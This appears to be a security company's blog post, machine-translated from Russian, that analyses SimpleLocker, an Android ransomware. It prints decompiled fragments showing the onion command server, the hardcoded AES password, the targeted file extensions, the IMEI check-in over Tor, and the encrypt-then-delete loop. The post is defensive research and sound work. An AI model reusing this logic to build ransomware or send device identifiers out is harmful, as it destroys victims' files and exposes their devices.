Analysis of Simplelocker-a - ransomware virus for Android

    Good afternoon, dear habuchiteli, today the specialists of our company would like to present to your attention the analysis of one Android virus that caught our eye not so long ago, if you can call it that, SimpleLocker. In order to learn more about it, we did a lot of work, which in general can be divided into 3 steps:

    Step 1. Analysis of the manifest and resources
    Step 2. Decompilation of the application
    Step 3. Analysis of the code

    Step 1. Analysis of the manifest and resources
    The first thing was It was decided to analyze the application resources using the aapt.exe utility to extract string content from the apk file with the command
    c: \ android \ apktool> aapt.exe list -a .. \ simple \ fd694cf5ca1dd4967ad6e8c67241114c.apk The

    permissions used in this application were as follows:

    There are receivers:

    as well as the following services:

    From the manifest we become aware that the virus can work with the TOR network and with an external memory card.
    Unpack the application and see what is in the resources. The most interesting is in the res \ raw folder. We find two disguised files as mp3, which actually provide an archive containing databases of GeoIP countries, as well as configuration files for TOR'a torrc
     SocksPort 9050
    SafeSocks 0
    TestSocks 1
    WarnUnsafeSocks 1
    Log notice stdout
    ControlPort 9051
    CookieAuthentication 1
    TransPort 9040
    DNSPort 5400
    AvoidDiskWrites 1
    Файл torrctether
    SocksPort 9050
    SafeSocks 0
    TestSocks 1
    WarnUnsafeSocks 1
    Log notice stdout
    ControlPort 9051
    CookieAuthentication 1
    RelayBandwidthRate 100 KBytes
    RelayBandwidthBurst 100 KBytes
    UseBridges 0
    AutomapHostsOnResolve 1
    TransPort 9040
    DNSPort 5400
    AvoidDiskWrites 1

    And the privoxy_config file
    # Generally, this file goes in /etc/privoxy/config
    # Tor listens as a SOCKS4a proxy here:
    forward-socks4a / .
    confdir /data/data/
    logdir /data/data/
    # actionsfile standard  # Internal purpose, recommended
    #actionsfile default.action   # Main actions file
    #actionsfile user.action      # User customizations
    #filterfile default.filter
    # Don't log interesting things, only startup messages, warnings and errors
    #logfile logfile
    #jarfile jarfile
    #debug 1
    #debug   0    # show each GET/POST/CONNECT request
    #debug   4096 # Startup banner and warnings
    #debug   8192 # Errors - *we highly recommended enabling this*
    #user-manual /usr/share/doc/privoxy/user-manual
    toggle  1
    accept-intercepted-requests 1 
    enable-remote-toggle 0
    enable-edit-actions 0
    enable-remote-http-toggle 0
    buffer-limit 4096

    Step 2. Decompiling the application
    To decompile the application, we will use the link service .

    Step 3. Code analysis. A
    quick look at the names of the classes, I stopped at the class. Let's see what constants are stored in it:
        public static final String ADMIN_URL = "http://xeyocsu7fu2vjhxs.onion/";
        public static final int CHECK_MAIN_WINDOW_TIME_SECONDS = 1;
        public static final String CIPHER_PASSWORD = "jndlasf074hr";
        public static final String CLIENT_NUMBER = "19";
        public static final String DEBUG_TAG = "DEBUGGING";
        public static final String DISABLE_LOCKER = "DISABLE_LOCKER";
        public static final List EXTENSIONS_TO_ENCRYPT = Arrays.asList(new String[] {
            "jpeg", "jpg", "png", "bmp", "gif", "pdf", "doc", "docx", "txt", "avi", "mkv", "3gp", "mp4"});
        public static final String FILES_WAS_ENCRYPTED = "FILES_WAS_ENCRYPTED";
        public static final int MONEYPACK_DIGITS_NUMBER = 14;
        public static final int PAYSAFECARD_DIGITS_NUMBER = 16;
        public static final int POLLING_TIME_MINUTES = 3;
        public static final String PREFS_NAME = "AppPrefs";
        public static final int UKASH_DIGITS_NUMBER = 19;

    By constant variables, we can assume where the data is sent, what password is used to encrypt files, which files are subject to encryption.
    The virus must somehow interact with the server and encrypt the files. Find the sections of code that are responsible for this functionality. We start by analyzing the class, which acts as the MainService service.
    Communication with the server.
    In the class, the TorSender.sendCheck (context) function is called in the run () method;
         public void run() {
                }, this class contains one method:
    public static void sendCheck(Context context)  {
            try  {
                JSONObject jsonobject = new JSONObject();
                jsonobject.put("type", "locker check");
                jsonobject.put("device id", Utils.getCutIMEI(context));
                jsonobject.put("client number", "19");
                (new HttpSender(jsonobject.toString(), HttpSender.RequestType.TYPE_CHECK, context)).startSending();
            catch (JSONException jsonexception) {

    A json object is created containing information about the request type, device IMEI:
    (Utils.getCutIMEI(context)) и номер клиента.
        public static String getCutIMEI(Context context)    {
            String s = getIMEI(context);
        public static String getIMEI(Context context)    {
            return ((TelephonyManager)context.getSystemService("phone")).getDeviceId();

    When sending, the proxy server is first created when the explicit constructor of the class is called
    public HttpSender(String s, RequestType requesttype, Context context1)    {
            dataToSend = s;
            settings = context1.getSharedPreferences("AppPrefs", 0);
            httpclient = new StrongHttpsClient(context1);
            httpclient.useProxy(true, "SOCKS", "", 9050);
            context = context1;
            type = requesttype;

    And then we call the startSending () method, which will transfer data to the eyocsu7fu2vjhxs.onion server.
        public void startSending()    {
            HttpResponse httpresponse = send(context, "http://xeyocsu7fu2vjhxs.onion/", dataToSend);

    File Encryption:
    The MainService service starts a stream to encrypt files.
    new Thread(new Runnable() {
    (new FilesEncryptor(context)).encrypt();

    Consider the explicit constructor of the FilesEncryptor (context) class
        public FilesEncryptor(Context context) {
            filesToEncrypt = new ArrayList();
            filesToDecrypt = new ArrayList();
            settings = context.getSharedPreferences("AppPrefs", 0);
            getFileNames(new File(Environment.getExternalStorageDirectory().toString()));

    We see the initialization of two lists intended for storing a list of regular and encrypted files, the getFileNames (File file) method fills the lists:
        private void getFileNames(File file) {
            String s = file1.getAbsolutePath();
            String s1 = s.substring(1 + s.lastIndexOf("."));
            if (extensionsToDecrypt.contains(s1)) {
            } else
            if (Constants.EXTENSIONS_TO_ENCRYPT.contains(s1))  {

    And the encrypt () method will encrypt files from the filesToEncrypt list
        public void encrypt() throws Exception {
            AesCrypt aescrypt;
            Iterator iterator;
            aescrypt = new AesCrypt("jndlasf074hr");
            iterator = filesToEncrypt.iterator();
            String s = (String);
            aescrypt.encrypt(s, (new StringBuilder(String.valueOf(s))).append(".enc").toString());
            (new File(s)).delete();

    Consider the class
    private final Cipher cipher = Cipher.getInstance ("AES / CBC / PKCS7Padding");
    AES 128 block encryption is used.
    In the class constructor, hash the password with the SHA-256 algorithm and generate the key for the cipher:
        public AesCrypt(String s) throws Exception  {
            MessageDigest messagedigest = MessageDigest.getInstance("SHA-256");
            byte abyte0[] = new byte[32];
            System.arraycopy(messagedigest.digest(), 0, abyte0, 0, abyte0.length);
            key = new SecretKeySpec(abyte0, "AES");
            spec = getIV();

    Well, the encryption method itself:
       public void encrypt(String s, String s1) throws Exception {
            FileInputStream fileinputstream = new FileInputStream(s);
            FileOutputStream fileoutputstream = new FileOutputStream(s1);
            cipher.init(1, key, spec);
            CipherOutputStream cipheroutputstream = new CipherOutputStream(fileoutputstream, cipher);
            byte abyte0[] = new byte[8];
            do {
                int i =;
                if (i == -1) {
                cipheroutputstream.write(abyte0, 0, i);
            } while (true);

    After conducting this series of studies, we can conclude that this virus has very poor functionality, namely:
    1. Grabbing IMEI victims
    2. Working with the TOR network
    3. File encryption

    Boyarkin Anton, Nabiev Nurlan, cybercrime investigation department , PentestIT

    Also popular now: